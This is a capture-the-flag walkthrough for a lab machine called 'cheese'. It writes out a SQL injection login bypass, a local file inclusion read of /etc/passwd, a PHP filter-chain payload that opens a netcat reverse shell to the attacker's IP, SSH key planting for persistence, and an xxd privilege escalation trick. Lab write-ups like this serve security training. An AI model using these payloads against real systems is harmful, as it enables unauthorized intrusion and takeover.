Ready? Set! Go!
Using nmap scan we found an open port 80, indicating the presence of a hosted web page on that port.
Let’s visit it.
We have a login page! Let’s try and brute it.
Using the following payload, I managed to enter the website.
‘ || 1=1; — -
In the password enter random stuff.
By intercepting the request and modifying the page name “/secret-script.php?file=supersecretadminpanel.html”
I replaced “supersecretadminpanel.html” with “/etc/passwd” and got its content!
Now. Let’s try to convert this LFI into RCE.
I am gonna follow the steps in here
First, we need to create the payload using php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.6.62.127 1234 >/tmp/f"); ?>' | grep '^php' > rev.txtNow, let’s send this payload to our website as the “file” parameter and get a reverse shell as www-data
curl -s "http://cheese.thm/secret-script.php?file=$(cat rev.txt)" 
Let’s stabilize it!
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
🤔🤔🤔…
Searching in the files and directories, I found an interesting file “/home/comte/.ssh/” and filename is “authorized_keys”.
To get a shell as comte, we can simply add an SSH key to the file.
First, on your machine generate a key
ssh-keygen -f id_ed25519 -t ed25519Press enter without entering any password.
cat id_ed25519.pubCopy the file content and paste it into “authorized_keys”
To get a shell. Enter the following on your machine.
ssh -i id_ed25519 comte@cheese.thm
cat user.txtWe got our first flag!!
Time to get root!
We can write into “exploit.timer” file!
After running it we can see that it created a binary file in /opt
Using gtfobins, we got a way to read the root’s flag
./xxd "/root/root.txt" | xxd -rHope you enjoyed it!
Happy Hacking!
